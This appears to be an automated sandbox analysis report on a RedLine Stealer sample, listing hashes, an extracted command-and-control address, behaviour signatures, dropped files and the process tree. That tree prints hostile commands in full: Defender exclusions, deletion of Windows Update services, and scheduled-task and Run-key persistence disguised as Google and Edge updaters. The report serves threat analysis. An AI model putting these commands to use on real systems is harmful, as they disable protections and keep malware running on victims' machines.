Analysis
-
max time kernel
243s -
max time network
296s -
platform
windows7_x64 -
resource
win7-20221111-en -
resource tags
arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system -
submitted
24-11-2022 15:56
Static task
static1
Behavioral task
behavioral1
Sample
63c02bf79ba67e69dfb5b5f115986f8b.exe
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
63c02bf79ba67e69dfb5b5f115986f8b.exe
Resource
win10v2004-20221111-en
General
-
Target
63c02bf79ba67e69dfb5b5f115986f8b.exe
-
Size
242KB
-
MD5
63c02bf79ba67e69dfb5b5f115986f8b
-
SHA1
0282d75ca0ef8167e1798ab5925bdddf604753c9
-
SHA256
84806d7ed59a57fce9b4bb07519d78f25edd45c5e56c5739a252f4b4b3c701e2
-
SHA512
0b2923317ef6cd3b034f61a22ad47ea95a4bf4de6c5f11a04a22a638f6c6de7c5d80dd844f6608de40a746c40f7a3e468d8daba26f7f81807e8c6b0b3844ebea
-
SSDEEP
6144:71gE5wi2UCeNWGa+nMzVWMNQErpV2IviDnye3sEuYq7Z:pgEaACe1a+nMzVWMNQErpV2IvQypEuYa
Malware Config
Extracted
redline
37.220.87.2:27924
-
auth_value
e457de0f8e67971846447e9d0f415966
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 4 IoCs
Processes:
resource yara_rule behavioral1/memory/340-56-0x0000000000400000-0x0000000000428000-memory.dmp family_redline behavioral1/memory/340-61-0x000000000042280E-mapping.dmp family_redline behavioral1/memory/340-62-0x0000000000400000-0x0000000000428000-memory.dmp family_redline behavioral1/memory/340-63-0x0000000000400000-0x0000000000428000-memory.dmp family_redline -
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
Processes:
brave.exeofg.exepid process 1744 brave.exe 944 ofg.exe -
Loads dropped DLL 2 IoCs
Processes:
vbc.exepid process 340 vbc.exe 340 vbc.exe -
Uses the VBS compiler for execution 1 TTPs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
63c02bf79ba67e69dfb5b5f115986f8b.exedescription pid process target process PID 1156 set thread context of 340 1156 63c02bf79ba67e69dfb5b5f115986f8b.exe vbc.exe -
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 1168 1156 WerFault.exe 63c02bf79ba67e69dfb5b5f115986f8b.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
vbc.exepid process 340 vbc.exe 340 vbc.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
vbc.exedescription pid process Token: SeDebugPrivilege 340 vbc.exe -
Suspicious use of WriteProcessMemory 34 IoCs
Processes:
63c02bf79ba67e69dfb5b5f115986f8b.exevbc.exeofg.exebrave.exedescription pid process target process PID 1156 wrote to memory of 340 1156 63c02bf79ba67e69dfb5b5f115986f8b.exe vbc.exe PID 1156 wrote to memory of 340 1156 63c02bf79ba67e69dfb5b5f115986f8b.exe vbc.exe PID 1156 wrote to memory of 340 1156 63c02bf79ba67e69dfb5b5f115986f8b.exe vbc.exe PID 1156 wrote to memory of 340 1156 63c02bf79ba67e69dfb5b5f115986f8b.exe vbc.exe PID 1156 wrote to memory of 340 1156 63c02bf79ba67e69dfb5b5f115986f8b.exe vbc.exe PID 1156 wrote to memory of 340 1156 63c02bf79ba67e69dfb5b5f115986f8b.exe vbc.exe PID 1156 wrote to memory of 1168 1156 63c02bf79ba67e69dfb5b5f115986f8b.exe WerFault.exe PID 1156 wrote to memory of 1168 1156 63c02bf79ba67e69dfb5b5f115986f8b.exe WerFault.exe PID 1156 wrote to memory of 1168 1156 63c02bf79ba67e69dfb5b5f115986f8b.exe WerFault.exe PID 1156 wrote to memory of 1168 1156 63c02bf79ba67e69dfb5b5f115986f8b.exe WerFault.exe PID 340 wrote to memory of 1744 340 vbc.exe brave.exe PID 340 wrote to memory of 1744 340 vbc.exe brave.exe PID 340 wrote to memory of 1744 340 vbc.exe brave.exe PID 340 wrote to memory of 1744 340 vbc.exe brave.exe PID 340 wrote to memory of 944 340 vbc.exe ofg.exe PID 340 wrote to memory of 944 340 vbc.exe ofg.exe PID 340 wrote to memory of 944 340 vbc.exe ofg.exe PID 340 wrote to memory of 944 340 vbc.exe ofg.exe PID 944 wrote to memory of 1992 944 ofg.exe SCHTASKS.exe PID 944 wrote to memory of 1992 944 ofg.exe SCHTASKS.exe PID 944 wrote to memory of 1992 944 ofg.exe SCHTASKS.exe PID 944 wrote to memory of 1992 944 ofg.exe SCHTASKS.exe PID 1744 wrote to memory of 1132 1744 brave.exe powershell.exe PID 1744 wrote to memory of 1132 1744 brave.exe powershell.exe PID 1744 wrote to memory of 1132 1744 brave.exe powershell.exe PID 1744 wrote to memory of 1000 1744 brave.exe cmd.exe PID 1744 wrote to memory of 1000 1744 brave.exe cmd.exe PID 1744 wrote to memory of 1000 1744 brave.exe cmd.exe PID 1744 wrote to memory of 1608 1744 brave.exe cmd.exe PID 1744 wrote to memory of 1608 1744 brave.exe cmd.exe PID 1744 wrote to memory of 1608 1744 brave.exe cmd.exe PID 1744 wrote to memory of 1296 1744 brave.exe powershell.exe PID 1744 wrote to memory of 1296 1744 brave.exe powershell.exe PID 1744 wrote to memory of 1296 1744 brave.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\63c02bf79ba67e69dfb5b5f115986f8b.exe"C:\Users\Admin\AppData\Local\Temp\63c02bf79ba67e69dfb5b5f115986f8b.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"2⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Google\brave.exe"C:\Users\Admin\AppData\Local\Google\brave.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force4⤵
-
C:\Windows\system32\cmd.execmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f4⤵
-
C:\Windows\system32\cmd.execmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 04⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }4⤵
-
C:\Users\Admin\AppData\Local\Google\ofg.exe"C:\Users\Admin\AppData\Local\Google\ofg.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\SCHTASKS.exeSCHTASKS /Create /TR "C:\Users\Admin\AppData\Local\Google\ofg.exe" /TN "MicrosoftEdge{e60e5877-76e2-4b84-98a8-90161a4b47ca}" /SC ONLOGON /F /RL HIGHEST4⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1156 -s 482⤵
- Program crash
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Google\brave.exeFilesize
2.8MB
MD59253ed091d81e076a3037e12af3dc871
SHA1ec02829a25b3bf57ad061bbe54180d0c99c76981
SHA25678e0a8309bc850037e12c2d72a5b0843dcd8b412a0a597c2a3dcbd44e9f3c859
SHA51229ff2fd5f150d10b2d281a45df5b44873192605de8dc95278d6a7b5053370e4ac64a47100b13c63f3c048df351a9b51f0b93af7d922399a91508a50c152e8cf4
-
C:\Users\Admin\AppData\Local\Google\ofg.exeFilesize
86KB
MD533dad992607d0ffd44d2c81fe67f8fb1
SHA1e5b67dc05505fb1232504231f41cba225c282d3c
SHA25695903d8c2d48c4c0667e41878807f646f7648a33ed25d0eb433aab41c25e31a4
SHA512444973b44292c433a07e5f75f6580ea71799b1f835677bc5b2e42af6b567a2f70f1b038f019d250a18216701ccf901b300632487eebcc1113ac803edb43159e4
-
\Users\Admin\AppData\Local\Google\brave.exeFilesize
2.8MB
MD59253ed091d81e076a3037e12af3dc871
SHA1ec02829a25b3bf57ad061bbe54180d0c99c76981
SHA25678e0a8309bc850037e12c2d72a5b0843dcd8b412a0a597c2a3dcbd44e9f3c859
SHA51229ff2fd5f150d10b2d281a45df5b44873192605de8dc95278d6a7b5053370e4ac64a47100b13c63f3c048df351a9b51f0b93af7d922399a91508a50c152e8cf4
-
\Users\Admin\AppData\Local\Google\ofg.exeFilesize
86KB
MD533dad992607d0ffd44d2c81fe67f8fb1
SHA1e5b67dc05505fb1232504231f41cba225c282d3c
SHA25695903d8c2d48c4c0667e41878807f646f7648a33ed25d0eb433aab41c25e31a4
SHA512444973b44292c433a07e5f75f6580ea71799b1f835677bc5b2e42af6b567a2f70f1b038f019d250a18216701ccf901b300632487eebcc1113ac803edb43159e4
-
memory/340-63-0x0000000000400000-0x0000000000428000-memory.dmpFilesize
160KB
-
memory/340-54-0x0000000000400000-0x0000000000428000-memory.dmpFilesize
160KB
-
memory/340-65-0x0000000075671000-0x0000000075673000-memory.dmpFilesize
8KB
-
memory/340-56-0x0000000000400000-0x0000000000428000-memory.dmpFilesize
160KB
-
memory/340-62-0x0000000000400000-0x0000000000428000-memory.dmpFilesize
160KB
-
memory/340-61-0x000000000042280E-mapping.dmp
-
memory/944-70-0x0000000000000000-mapping.dmp
-
memory/1000-75-0x0000000000000000-mapping.dmp
-
memory/1132-73-0x0000000000000000-mapping.dmp
-
memory/1132-74-0x000007FEFB6F1000-0x000007FEFB6F3000-memory.dmpFilesize
8KB
-
memory/1168-64-0x0000000000000000-mapping.dmp
-
memory/1296-77-0x0000000000000000-mapping.dmp
-
memory/1608-76-0x0000000000000000-mapping.dmp
-
memory/1744-67-0x0000000000000000-mapping.dmp
-
memory/1992-72-0x0000000000000000-mapping.dmp